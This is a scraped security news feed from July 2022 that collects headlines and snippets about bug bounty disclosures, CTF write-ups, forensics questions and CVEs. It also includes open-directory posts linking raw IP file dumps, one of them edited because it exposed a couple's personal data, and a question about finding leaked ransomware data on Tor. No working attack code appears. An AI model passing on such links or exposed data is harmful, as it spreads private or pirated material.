    OISF 2022 These are the videos from the OISF Anniversary Event. Intro Becoming an IR Superstar Matt Scheurer Ransomware Is NOT the problem Scott Nusbaum Hybrid image-based approaches for modern malware classification Dr. Phu Phung How a 1993 CCG prepared me for a life in Info Sec Micah Brown Rethinking Cybersecurity in the Quantum Age Jerod Brennen Evaluating the Security of an Enterprise IoT Deployment - From Acquisition to Support Deral Heiland Download from: https://archive.org/details/oisf2022
  • Open

    Status, Vulnerability, and Status Vulnerability
    Article URL: https://eriktorenberg.substack.com/p/status-vulnerability-and-status-vulnerability Comments URL: https://news.ycombinator.com/item?id=32043881 Points: 1 # Comments: 0
  • Open

    Practical Approach on Securing Web Sessions
    submitted by /u/quercialab [link] [comments]
  • Open

    Free cybercrime intelligence tool - check any company domain and see how many of their employees and clients were compromised by info-stealers
    Check domains for free across our database of over 5,700,000 computers compromised with info-stealers world wide - https://www.hudsonrock.com/are-you-compromised Also available via https://inteltechniques.com/tools/Breaches.html under "HudsonRock" What is it? - this free tool enables you to search for domains and see how many compromised employees & users they have from our continuously augmented cybercrime database, this can be useful for several reasons: Risk assessment - looking up a company and seeing they have a lot of compromised employees can indicate the company is not up to date with proper security measures, each compromised employee indicates that someone in the company downloaded and executed an info-stealing malware and had all their corporate credentials, cookies, docume…
  • Open

    Best offline AV/Scan bootable
    Need to retreive ~128G og files from a suspected corrupted USB drive received from an untrustworthy source. No other way to capture source data. Been years since I have been in need of a bootable AV and dont recognize the product landscape. Looking for a scanner which can target specified external USB drives. Bonus if it does everything from rootkits to malware and more. submitted by /u/QuantumFiddle [link] [comments]
    Computer Ransomwared
    My aunts company had a few computers ransomwared. Where on the tor could I go look to see if any of her data is for sale. I found a couple of old links. Anyone have any sources? submitted by /u/jamestech221 [link] [comments]
  • Open

    Couple with movies/tv etc. 1 posted about a year ago, the other... new to us it would seem!
    http://www.moviefyy.com/ EDIT: removed cause it does indeed have some personal info (and frankly huge wedding photo files!) Prophylactic [NSFW] tag just in case. submitted by /u/ringofyre [link] [comments]
    New to OD, need advice on how to open video files
    How do i open files like this one (AVI and other video files, already tried using VLC didn't work) https://www.mmnt.net/db/0/0/89.178.3.122/sdb1/Big%20Tit%20Superstars%20Of%20The%2070's%20-%20Carol%20Connors is the file broken or is there any other way? submitted by /u/Pink__banana [link] [comments]
    Decade Old PC software and drivers
    http://31.48.171.80:86/Public/Software/ submitted by /u/SeniorAlbatross [link] [comments]
    Czech/Slavic Ebooks
    submitted by /u/SeniorAlbatross [link] [comments]
  • Open

    Debug Log: Why is my M.2 SSD so slow?
    The back story of this debugging session is that I'm reworking a bit my home server. One of the things I'm doing is putting some more HDDs in there and sharing them over the network with my other computers. But since HDDs are a bit slow, I decided to add two M.2 NVMe SSD which I had lying around for caching (with bcache). Now this is a pretty old home server - I've built it in 2016 and used what even then was considered previous gen technology. This means it had only one M.2 slot, which was already used by the OS SSD. So the disks had to go the the PCI Express slots. For the disks themselves this isn't really a problem, as M.2 NVMe is basically PCIe in a different form factor. So just a simple (electrically speaking) adapter was enough. And while one of the SSDs worked well, the other was …

  • Open

    RouterSpace From Hackthebox
    No content preview
    Exposing Millions of Voter ID card user’s details.
    No content preview
    Docker: Creating a Pivoting Lab and Exploiting it
    No content preview
    HackTheBox Writeup: RouterSpace
    No content preview
    How I Hacked My College Server?
    No content preview
    IW Weekly #7: Facebook account takeover, Java Deserialization, SSRF, and more…
    No content preview
  • Open

    RouterSpace From Hackthebox
    No content preview
    Exposing Millions of Voter ID card user’s details.
    No content preview
    Docker: Creating a Pivoting Lab and Exploiting it
    No content preview
    HackTheBox Writeup: RouterSpace
    No content preview
    How I Hacked My College Server?
    No content preview
    IW Weekly #7: Facebook account takeover, Java Deserialization, SSRF, and more…
    No content preview
  • Open

    RouterSpace From Hackthebox
    No content preview
    Exposing Millions of Voter ID card user’s details.
    No content preview
    Docker: Creating a Pivoting Lab and Exploiting it
    No content preview
    HackTheBox Writeup: RouterSpace
    No content preview
    How I Hacked My College Server?
    No content preview
    IW Weekly #7: Facebook account takeover, Java Deserialization, SSRF, and more…
    No content preview
  • Open

    DoS via lua_read_body() [zhbug_httpd_94]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1596252 - Bounty: $480
    Apache HTTP Server: mod_proxy_ajp: Possible request smuggling
    Internet Bug Bounty disclosed a bug submitted by ricterz: https://hackerone.com/reports/1594627 - Bounty: $2400
    Read beyond bounds via ap_rwrite() [zhbug_httpd_47.2]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595299 - Bounty: $480
    Read beyond bounds in mod_isapi.c [zhbug_httpd_41]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595296 - Bounty: $480
    Controllable read beyond bounds in lua_websocket_readbytes() [zhbug_httpd_126]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595290 - Bounty: $480
    Read beyond bounds in ap_strcmp_match() [zhbug_httpd_47.7]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595281 - Bounty: $480
  • Open

    Does "Autostart" Really Mean "Autostart"?
    Most DFIR and SOC analysts are familiar with the Run keys as autostart locations within the Windows Registry: [HKLM|HKCU]\Software\Microsoft\Windows\CurrentVersion\Run Values beneath these keys are automatically run asynchronously upon system start and user login, respectively. This is something we've know for a while, and we've dutifully incorporated these autostart locations into our "indicators of program execution" artifact category. It turns out, that may not be the case. Wait...what? Did I just say that a value listed in one of the aforementioned Run keys may not, in fact, be executed at system start or user login??  Yes...yes, I did. Let's first start with validating that the entries themselves have been run. We know that we can parse the  Microsoft-Windows-Shell-Core%4Operational E…
  • Open

    HacktheBox[routerspace]
    Initial full TCP Nmap scan of the box reveals ports 80 and 22 are open: Continue reading on Medium »
  • Open

    SecWiki News 2022-07-09 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-09 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    ATT&CK Execution技术攻防
    文章中很多内容没有进一步展开讨论,如果读者感兴趣,可以私聊或者在评论区讨论。
  • Open

    How to Hack a MacOS Application
    🔍 Introduction “How to Hack a MacOS Application”은 Apple의 MacOS에서 동작하는 어플리케이션을 테스팅하는 방법입니다. 전반적인 테스팅 메커니즘과 환경 구성에 대한 내용을 주로 다룹니다. Directory Structure Application Application 디렉토리는 실제 앱 파일과 메니페스트 정보가 위치합니다. MacOS 앱 분석 시 CLI 도구를 통해서 체크하는 부분도 많은데, 이 때 해당 디렉토리의 바이너리를 활용합니다. /Applications//Contents Info.plist: 패키지에 대한 자세한 정보 MacOS: 실제 앱 실행에 사용되는 바이너리가 위치한 디렉토리 PkgInfo: 패키지 정보 _CodeSignature: 서명 Frameworks: 앱에 사용된 프레임워크들 Resources: 리소스 디렉토리 CodeResources: 코드 리소스 Data Data 디렉토리는 앱이 사용하는 데이터들이 모인 디렉토리입니다. 대표적으로 Cache, Local DB 등이 있고 해당 디렉토리도 자세하게 체크해야할 디렉토리입니다. /Users//Library/Application Support/ 🗡 Hack Mechanism File system 위 Directory Structure에서 이야기한 2개의 디렉토리는 정말 중요합니다. 해당 디렉토리에서 분석에 필요한 전반적인 정보를 얻을 수 있습니다. /Applications//Contents /Users//Library/Application Support/ Info.plist /Applications//Contents에 있는 Info.plist는 앱에 대한 정보를 담고있는 plist(xml) 파일입니다. plist 파일이 떄문에 plutil 등으로 확인해야 정상적인 내용을 볼 수 있습니다. plutil -p Info.plist Notion 앱 예시 { "BuildMachineOSBuild" => "19F101" "CFBundleDisplayName" => "Notion" "CFBundleExecutable" => "Notion" "CFBundleIconFile" => "electron.icns" "CFBundleIdentifier" => "notion.id" "CFBundleInfoDictionaryVersion" => "6.0" "CFBundleName" => "Notion" "CFBundlePackageType" => "APPL" "CFBundleShortVersionString" => "2.0.22" "CFBundleURLTypes" => [ 0 => { "CFBundleURLName" => "notion" "CFBundleURLSchemes" => [ 0...
  • Open

    Figuring out what I want to be when I grow up
    I'm a just over 40 y/o IT Professional who in the last couple of years managed to get out of system administration to now working in a SOC. In the last 5-ish years I got my Security+, CySA+ and CISSP. Currently my role in the SOC is more of an administrator of tools that the the IR and Vulnerability people use, and not much hands on using the tools. I'm trying to figure out what direction I should go and what my next steps should be, and if there is a title/job description (not literally) that I should look towards as a goal for the time being. At this time I don't want to go into a management area, I like having my hands on keyboards and not in meetings. I do like doing the vulnerability scanning and remediation, the only thing in my current workplace the vulnerability team does the scanning and informs the administrative teams what needs to be remediated. Incident Response and Threat analytics sounds interesting but also high stress. I've been looking at penetration testing and red teaming as a direction to study but as I'm going through stuff I don't feel like I have the temperament of "gotta pwn the system" and because of that I feel like there are younger people better suited to doing that. What conceptually sounds good to me is something like being a consultant where I'm part of a team that does the security assessment for organizations and helps to identify where the vulnerabilities are, do the risk analysis and remediate the issues. I may have answered my own question with that, but is there a job role/title like that which I can use as a guide to figure out what sort of training I need to position myself for it? submitted by /u/beerdini [link] [comments]
    POV: you are at your favorite cafe with a hacker who hijacked the router.
    You are a cyber security specialist who enter the café with your laptop to check your company's self-hosting email server while sipping your favorite latte "or whatever drink you want to sip". You have connected your laptop to the public access point who was setup by a self-hating person who didn't even bother to change router's credentials (usr=admin, pass=admin). There is a hacker who were sent by your company's competitor and he's in the same shop you're in but you can't tell since there are 4 people connected to the same hotspot as you are using their own laptops (total of 5 people currently connected to the Wi-Fi hotspot). The hacker took advantage of that and changed the router's credentials and gained complete control of the ISP-provided router before initiating his attack and his goal is to eavesdropping on your company's plans and secrets. What sort of unauthorized attack can the hacker do to eavesdrop. How would you defend yourself against the attacker (assuming you started to suspect after you have connected to the same hotspot for a while using no vpn). What would you do to spot the hacker. submitted by /u/6TedtheUnDead9 [link] [comments]
    Vulnerability scanning tools for multi-networks?
    I’m looking to start a vulnerability management business. I’m aware of tools such as Nessus, nexpose etc. I’m looking for a tool, paid or open source to start. I’m wanting to do vulnerability scans on multiple different networks, doing the vulnerability scans for businesses and giving them the CVE reports. Is there any tools that would be good for this? Nessus, and nexpose seem to be good for a permanent solution for a single business that manages their own vulnerability scans, where I need more of something that I can use on multiple networks. OpenVAS appears to be free but not a good solution for multiple different networks, especially not scanning servers. Any thoughts or advice would be appreciated Thanks In advance submitted by /u/AggravatingShame576 [link] [comments]
  • Open

    Fuzzing the Rust Typechecker Using Constraint Logic Programming [pdf]
    Article URL: https://sites.cs.ucsb.edu/~benh/research/papers/dewey15fuzzing.pdf Comments URL: https://news.ycombinator.com/item?id=32034841 Points: 2 # Comments: 0
  • Open

    photos of physicists
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Been posted here before, but it's regularly updated.
    Last posted 158Days ago. http://192.64.86.228/%5bb%5d/ Credits to u/JiminythecricketinOz submitted by /u/amritajaatak [link] [comments]

  • Open

    How I hacked the JEE coaching Website and shutdown the class live-stream
    STORY Continue reading on Medium »
    The Ultimate Kali Linux Book
    Perform advanced penetration testing using Nmap, Metasploit, Aircrack-ng, and Empire Continue reading on Medium »
    How Burpsuite-pro helped me to get a 5 digit Bounty !
    Hello ppl, This is Aravind here with another awesome write-up. So now am gonna tell the story about how burpsuite pro helped me to get a 5… Continue reading on Medium »
    APT Groups with AI Generated Images
    I ran some APT Group names through Google’s AI image generator. Results are probably what you’d expect. Continue reading on Medium »
    Finding SQL Injections through source code in .NET applications
    CodeAllTheThings Continue reading on Medium »
    Innovation in the Free World
    Objective Reviewers Continue reading on Medium »
    Account Takeover via Response Manipulation
    Hello everyone I am Abhishek pal here* with my First blog ,In this blog I am going to give details about an easy P1 bug I encountered… Continue reading on Medium »
  • Open

    [OSINT Walkthrough] Solving a Twitter OSINT Challenge #01
    I’ve notice a lot of good Twitter OSINT challenges lately, so I decided to take some of them. This will be a series of OSINT challenges… Continue reading on Medium »
    Ethereum (ETH) investigations
    Ethereum (ETH) is the second most popular cryptocurrency in the world, as well as a platform for creating decentralized online services… Continue reading on Medium »
    Kremlin’s “fervid patriotism” and the emergence of “vozmezdiye”
    Sifting through the claims made by Russia from Bucha to Kremenchuk, all what the fact-checkers have found is a string of blatant lies. Continue reading on Medium »
    War in Ukraine / July 7
    HIMARS slow down the advance of Russian troops Continue reading on Medium »
  • Open

    Unauthorized packages modification or secrets exfiltration via GitHub actions
    Hyperledger disclosed a bug submitted by dusty_wormwood: https://hackerone.com/reports/1548870 - Bounty: $1500
    Open Redirect through POST Request in www.redditinc.com
    Reddit disclosed a bug submitted by kratul: https://hackerone.com/reports/1310230
    Exposed valid AWS, Mysql, Sendgrid and other secrets
    Glovo disclosed a bug submitted by mehdisadir: https://hackerone.com/reports/1580567
  • Open

    SecWiki News 2022-07-08 Review
    全国攻防演习的防守体系建设 by ourren 一种全新的内存马 by ourren 自建可信钓鱼邮件服务器 by ourren 在软件工程领域,搞科研的这十年! by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-08 Review
    全国攻防演习的防守体系建设 by ourren 一种全新的内存马 by ourren 自建可信钓鱼邮件服务器 by ourren 在软件工程领域,搞科研的这十年! by ourren 更多最新文章,请访问SecWiki
  • Open

    Syndication.photoslibrary... What is this thing?
    I'm am trying to figure out this path for the Syndication.photos library folder. The device I am working on is an iPhone 11running iOS 15.5. There is a video stored within the following path: private/var/mobile/Library/Photos/Libraries/Syndication.photoslibrary/scopes/syndication/originals/ This video appears in the camera roll with the iOS naming (IMG_XXXX.mp4) and shows it was downloaded from a messaging app. When it is located at the syndication folder, it appears to have a hexidecimal value for the naming convention, and ending in .mp4. There is also an instance of this video in the SMS/Attachments path, ending with the IMG_XXXX.mp4, with the same hash value. When searching for the IMG_XXXX naming convention, all the other file hits go to private/var/mobile/Media/PhotoData/... There …
  • Open

    Let’s Learn about Cookie and Its Security
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Let’s Learn about Cookie and Its Security
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Let’s Learn about Cookie and Its Security
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Bugs, pests and Crops!
    How do I keep finding these. Buncha bugs, Pests, crop viruses, crops, and insects. https://www.thesheepsite.com/diseaseinfo/images/ https://agritech.tnau.ac.in/crop_protection/rice/ http://vegetablemdonline.ppath.cornell.edu/Images/ submitted by /u/amritajaatak [link] [comments]
    Tons of random stuff (Software, Movies, Shows)
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Scanning 1.7 million Australian domains and finding 1.62 million SPF & DMARC security issues
    submitted by /u/caniphish_ltd [link] [comments]
  • Open

    12万从业者同频!CIS网络安全创新大会·夏日版“元宇宙”齐冲浪
    8小时直播,20余议题,12万网安从业者们的夏日冲浪趴圆满落幕!
    「斗象攻防演练宝典」之弱密码如何“扫雷”
    见微密码安全审计系统,帮助企业在攻防演练中解决弱口令问题,全方位、多角度的完善用户安全体系建设
    参数化导致的WAF绕过研究
    前面的两篇文章中,我们已经对编码和normalize这两个阶段可能造成的WAF绕过进行了分析。按之前文章分析结论,参数化是整个WAF工作过程中的又一个重要阶段,在这个阶段中同样存在可以绕过WAF的思路
    苹果将推出新安全功能“封锁模式”,可保护设备免受间谍软件攻击
    苹果公司宣布,计划在iOS 16、iPadOS 16和macOS Ventura中引入一种新模式Lockdown Mode(封锁模式)。
  • Open

    External Attack Surface Management for Red Teaming
    The modern cyber threat landscape sees an ever-expanding influx of malicious actors using a slew of tactics, techniques, and tools to… Continue reading on Medium »
  • Open

    CVE-2022-33980: Apache Commons Configuration2 Arbitrary Code Execution
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-33980 Comments URL: https://news.ycombinator.com/item?id=32024034 Points: 2 # Comments: 0
  • Open

    "Password protection" in Azure
    Hi there. Can someone explain how works password protection in Azure? As I understand it bans a variety of one word, for example, if users like to use passwords like qwerty123!, 123qwerty%, qwertyyy4636, etc. I can ban them by the word "qwerty", yes? If there are such passwords: Qwer1234!@#$ Q!w2e3r4t5 Qwedcxzas4 And to ban them, I can use the only one word qwerty? Or do I need to use the separate words for each other? Qwer1234!@#$ -> qwer Q!w2e3r4t5 -> qwert (or no?) Qwedcxzas4 ->qwedcxzas submitted by /u/athanielx [link] [comments]

  • Open

    Clickjacking Vulnerability In Whole Page Ads Tiktok
    TikTok disclosed a bug submitted by rioncool22: https://hackerone.com/reports/1418857 - Bounty: $500
    HTTP Request Smuggling Due to Flawed Parsing of Transfer-Encoding
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1524555
    HTTP Request Smuggling Due To Improper Delimiting of Header Fields
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1524692
    HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1501679
    Brute force of a current password on a disable 2fa leads to guess password and disable 2fa.
    Omise disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1465277
    Remote denial of service in HyperLedger Fabric
    Hyperledger disclosed a bug submitted by fatal0: https://hackerone.com/reports/1604951 - Bounty: $1500
    Stack Buffer Overflow via `gmp_sprintf`in `BLSSignature` and `BLSSigShare`
    SKALE Network disclosed a bug submitted by voiddy: https://hackerone.com/reports/1546935 - Bounty: $2500
  • Open

    Laptop HP Forensic Image
    Hello, I wanted to see if anyone could help me out. I have an old laptop that I want to mess with, so I can learn how to create an image of it. How can I extract an image from my HP laptop, what forensic tools can I use? Any YouTube videos or websites that show a step by step how to do this? Thanks in advance! submitted by /u/Sudden_Ad9859 [link] [comments]
    Odd FTK Imager behavior
    Got a micro SD card from dash cam to analyze. In Windows Explorer, via write blocker, the card looks formatted by Android with typical folders you would see if used in a phone. In FTK Imager, I see the folders and subfolders for the dash cam. Found hundreds of videos. A month later, I open FTK Imager, same version, and view the card again, only this time I only get the Android data. I cannot locate the dash cam folders or videos. I have rolled back to earlier versions of FTK Imager and tried Windows 11, 10, and 7. Has anyone ever experienced something like this before or possibly have any recommendations for next steps to try. Thanks in advance. submitted by /u/rgc_71 [link] [comments]
    Evtx Rules
    Hello everyone, Hope you all had a great holiday. I have the following situation pulled from an .EVTX log, and I am wondering if there is a log or file that tells me what "specific words" rule was deleted please. "Microsoft Outlook Delete rule "Delete messages with specific words"? submitted by /u/clarkwgriswoldjr [link] [comments]
    A DIY Windows forensics challenge
    Hi all, I thought this is helpful for anyone wanting to get their hands on a Windows system with realistic attack patterns to perform a forensic analysis on it. I've published a Github repo that includes a script, based on AtomicRedTeam, which will run a few selected atomic techniques that are great for beginner and medium experienced analysts to practice forensics. You can completely run it on your own lab / Windows system (e.g. trial version). I published this as part of a course that is nowadays available on The Cyber Mentor Academy for cheap (full disclaimer!), however, there's no need for the course to get this going. It's a way to provide students with the opportunity to create their own forensic evidence and practice the full forensic process, which I wish was around when I started learning this. Practical windows forensics Github repo: https://github.com/bluecapesecurity/PWF Hope this is helpful for people! submitted by /u/masch_aut [link] [comments]
    iOS Synced Data Metadata/Artefacts:
    Let’s assume we are examining a file system extraction of an iPhone; is there a way to tell which data on the device was synced onto the device? e.g. if we narrowed down to iMessages would there be a database/PLIST file which contains that info? submitted by /u/1-bitbybit-0 [link] [comments]
  • Open

    Mostly Linux-related stuff but contains stuff like Samsung smart view and his cpuinfo output
    submitted by /u/themariocrafter [link] [comments]
  • Open

    how to find information disclosure bugs (:
    hello 👋 people of the internet so this is my frist writeup i hope i don’t suck that much. Continue reading on Medium »
    PII Disclosure of Apple Users ($10k)
    How I hacked Apple and was able to Disclose Apple Users Private Shipping Information and Mobile Numbers. Continue reading on Medium »
    Awesome Bug Bounty Tools
    Continue reading on Medium »
  • Open

    Koh: The Token Stealer
    Years ago I was chatting with a few experienced red teamers and one was lamenting token abuse. Specifically, they wanted to be able to… Continue reading on Posts By SpecterOps Team Members »
    Hackers Abusing BRc4 Red Team Penetration Tool in Attacks to Evade Detectionument
    Malicious actors have been observed abusing legitimate adversary simulation software in their attacks in an attempt to stay under the… Continue reading on Medium »
  • Open

    War in Ukraine / July 6
    Britain without Johnson. What does this mean for Ukraine? Continue reading on Medium »
    “Mastering Cyber Intelligence” Notes
    Mastering Cyber Intelligence by Jean Nestor M. Dahj is the best cyber threat intel book I’ve read so far. It’s comprehensive and detailed… Continue reading on Medium »
    Tracking a Person Using OSINT
    Wondering how tech detectives track people using Open Source Intelligence and some Digital Forensics skills? Today I am gonna show a basic… Continue reading on Medium »
    Một số cách để thống kê mục tiêu có gì
    Trong khi đi khai thác thì phải biết được mục tiêu khai thác có những gì phạm vi tới đâu vì chúng ta đứng bên ngoài khai thác vào, các… Continue reading on Medium »
  • Open

    Altiris Methods for Lateral Movement
    submitted by /u/dmchell [link] [comments]
  • Open

    Does anyone have any idea what this is?
    For the past 10 days or so, my friend has been receiving a lot of spam emails such as this one. Written in some sort of a code. Does anyone know how to decipher it? And what it is? https://cdn.discordapp.com/attachments/538420241794072579/994635097288491068/Screenshot_2022-07-07-18-04-38-23_45e686c594768066ad9911d54d96f72b.jpg submitted by /u/Kolur96 [link] [comments]
    how does omegle (p2p chat with randos) work without port forwarding?
    from my understanding two computers can't talk to each other without open ports on either of them if there is a way to make this work what's protecting me from becoming part of botnet by just visiting a website? submitted by /u/GreedyAd9811 [link] [comments]
    InsightVM Scans vs Agents
    Personally I'm new to the insightVM agents, not the authenticated scanning. The company I'm with chose to deploy the agents so they didn't have to use the privilege elevation in scanning, while still performing non-root-level scans. This was all implemented before I joined the company but what I've gathered they were told they didn't need to do elevated privilege scans because they use the agents. There is a lot of complaints of remediation something but insightVM says it's still an issue and insightVM sucks. Essentially blame insightVM as a poor product. Having used insightVM for so many years, I still call it nexpose, many of these vulnerabilities should be getting caught as remediated but arent. So is there something wrong with our implementation or is because we still need the elevated scans? The way I read rapid7 docs is that the agent doesn't replace the scans. Thanks submitted by /u/squirrel_butter [link] [comments]
  • Open

    SecWiki News 2022-07-07 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-07 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Advisory: FESTO: CECC-X-M1 - Command Injection Vulnerabilities
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
    Automating binary vulnerability discovery with Ghidra and Semgrep
    submitted by /u/0xdea [link] [comments]
  • Open

    Apache Commons Configuration insecure interpolation defaults (CVE-2022-33980)
    Article URL: https://lists.apache.org/thread/tdf5n7j80lfxdhs2764vn0xmpfodm87s Comments URL: https://news.ycombinator.com/item?id=32014498 Points: 1 # Comments: 0
  • Open

    Scraping Login Credentials With XSS
    Unauthenticated JavaScript Fun In prior blog posts I’ve shown the types of weaponized XSS attacks one can perform against authenticated users, using their session to access and exfiltrate data, or perform actions in the application as that user. But what if you only have unauthenticated XSS? Perhaps your client hasn’t provided you with credentials to... The post Scraping Login Credentials With XSS appeared first on TrustedSec.
  • Open

    FreeBuf早报 | 中国红客联盟宣布解散并更名;人脸识别漏洞成骗子作案工具
    中国红客联盟官方微博发布公告,即日起宣布解散,并更名为弘客联盟。
    用户认可 | 斗象科技入选2022网络安全“大众点评”百强榜
    安在正式发布《2022中国网络安全产品用户调查报告》,斗象成功入选“大众点评”百强榜!
    为什么API网关不足以保证API安全?API安全之路指向何处
    根据 Gartner 的预测,到 2023 年,超过 50% 的 B2B 交易将摆脱传统方式,转而通过实时 API 进行。
    升级为Rust,Hive勒索软件加密将变得更加复杂
    近期,微软安全部门的研究人员发现了一种名为Hive的升级版勒索软件服务(RaaS),随即安全专家在周二的一份报告中概述了他们的发现,在报告中,专家们阐述了以下观点:随着其最新版本的几个重大升级,Hive也证明了它是发展最快的勒索软件家族之一,也例证了不断变化的勒索软件生态系统。根据微软的说法,Hive勒索软件最新版本的升级代表着对整个勒索软件基础架构的彻底改革,在报告中,专家们还指出最值得注意的变
    FreeBuf周报 | 欧盟举办超大规模网络安全演习;PCI DSS 4.0发布以应对新兴威胁和技术
    各位 FreeBufer 周末好~我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!
    万豪国际数据遭泄露,20GB文件被窃取
    万豪国际连锁酒店遭遇新的数据泄露事件,攻击者从该公司网络中窃取了约20GB的文件。
    一次持续的邮件钓鱼攻击的简单溯源分析,看看是谁在钓鱼?
    1次持续的邮件钓鱼攻击行动的溯源分析
  • Open

    W Weekly #6: Bypassing 2FA, Steghide Challenges, PEStudio Walkthrough, and more…
    No content preview
    Annie From TryHackme
    No content preview
  • Open

    W Weekly #6: Bypassing 2FA, Steghide Challenges, PEStudio Walkthrough, and more…
    No content preview
    Annie From TryHackme
    No content preview
  • Open

    W Weekly #6: Bypassing 2FA, Steghide Challenges, PEStudio Walkthrough, and more…
    No content preview
    Annie From TryHackme
    No content preview

  • Open

    Privilege escalation possible in dovecot when similar passdbs are used
    Open-Xchange disclosed a bug submitted by julezman: https://hackerone.com/reports/1561579 - Bounty: $900
    Ownership check missing when updating or deleting attachments
    Nextcloud disclosed a bug submitted by kesselb: https://hackerone.com/reports/1579820
    Blind User-Agent SQL Injection to Blind Remote OS Command Execution at
    Sony disclosed a bug submitted by echidonut: https://hackerone.com/reports/1339430
  • Open

    7+3 Vulnerable Apps To Get Started With Android Penetration Testing
    There are currently 3.8 billion smartphone users in the world and this number is doomed to rise in the next years. Continue reading on Medium »
    Exposing Millions of Voter ID card user’s details.
    Critical IDOR disclosing millions of Voter ID card details of Individuals on the official voter ID maintaining platform. Continue reading on Medium »
    YOLO Smart Contracts are Coming to a Blockchain Near You
    Explainer and Community Bounty Continue reading on YOLOrekt »
    OTP Bypass through response manipulation.
    Hello Readers, I am Tariq Rafiq Kehar , a bug hunter. Continue reading on Medium »
    Synthetix Logic Error Bugfix Review
    Summary Continue reading on Immunefi »
    How I found Open redirect on Bug crowd public program in 2 day
    Tools : - Burp suite - Burp JS Link Finder Continue reading on Medium »
    How I Got my first bounty $$
    Hello hackers, Continue reading on Medium »
    Dorks Eye-Google Hacking Dork Scraping and Searching Script
    Dorks Eye is a Python 3-based script. You can easily find Google Dorks using this tool. Dork Eye collects potentially vulnerable web pages… Continue reading on Medium »
    Update your Chrome browser now to avoid a dangerous vulnerability
    Google has released a security update for the Chrome browser that fixes a zero-day vulnerability . This bug affects Windows, Mac and… Continue reading on Medium »
    SSRF web application vulnerability.
    What is an SSRF? Continue reading on Medium »
  • Open

    Shvanidzor access restriction: an open-source study
    It is early July 2022 and thus still the school holiday season in Armenia. There is little activity around noon in Shvanidzor. The village… Continue reading on Medium »
    OSINT
    OSINT Stands for Open-Source INTelligence Continue reading on Medium »
    War in Ukraine / July 5
    The next big battle is for Sloviansk Continue reading on Medium »
    Open Source Intelligence
    Open Source Intelligence (OSINT) is intelligence collected from publicly available resources. To take a real-life scenario let’s take that… Continue reading on Medium »
  • Open

    OpenSSL远程代码执行漏洞 (CVE-2022-2274)
    OpenSSL 3.0.4版本在支持AVX512IFMA指令的X86_64 cpu的RSA实现中引入了一个严重的问题。这个问题使得RSA的2048位私钥实现在这样的机器上不正确,并且在计算过程...
  • Open

    OpenSSL远程代码执行漏洞 (CVE-2022-2274)
    OpenSSL 3.0.4版本在支持AVX512IFMA指令的X86_64 cpu的RSA实现中引入了一个严重的问题。这个问题使得RSA的2048位私钥实现在这样的机器上不正确,并且在计算过程...
  • Open

    Microsoft Sentinel Automation Tips & Tricks – Part 2: Playbooks
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-07-06 Review
    RSAC2022解读-人工智能安全洞察—在对抗中前进 by ourren 设计你的安全架构OKR by ourren 拟态防御技术详解(核心技术篇) by ourren Mandiant网络威胁情报分析师核心能力框架 by ourren Tetragon -- 基于 eBPF 的安全可观测性 & 运行时增强 by ourren 陆海空天一体化信息网络发展研究 by ourren 卫星“黑客”详解“卫星通信的安全缺陷” by ourren 基于图注意网络的跨安全数据库实体关系预测 by ourren 云主机AK/SK泄露利用 by ourren 跨链桥:Web3黑客必争之地 by ourren 微信小程序抓包之路 by ourren CS插件—梼杌(基于cobalt strike平台的红队自动化框架) by ourren cf: 云环境利用框架 Cloud Exploitation Framework by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-06 Review
    RSAC2022解读-人工智能安全洞察—在对抗中前进 by ourren 设计你的安全架构OKR by ourren 拟态防御技术详解(核心技术篇) by ourren Mandiant网络威胁情报分析师核心能力框架 by ourren Tetragon -- 基于 eBPF 的安全可观测性 & 运行时增强 by ourren 陆海空天一体化信息网络发展研究 by ourren 卫星“黑客”详解“卫星通信的安全缺陷” by ourren 基于图注意网络的跨安全数据库实体关系预测 by ourren 云主机AK/SK泄露利用 by ourren 跨链桥:Web3黑客必争之地 by ourren 微信小程序抓包之路 by ourren CS插件—梼杌(基于cobalt strike平台的红队自动化框架) by ourren cf: 云环境利用框架 Cloud Exploitation Framework by ourren 更多最新文章,请访问SecWiki
  • Open

    Linux Kernel Exploitation Techniques: modprobe_path
    submitted by /u/s4m4k [link] [comments]
  • Open

    made a mistake with my workflow. Should I be worried?
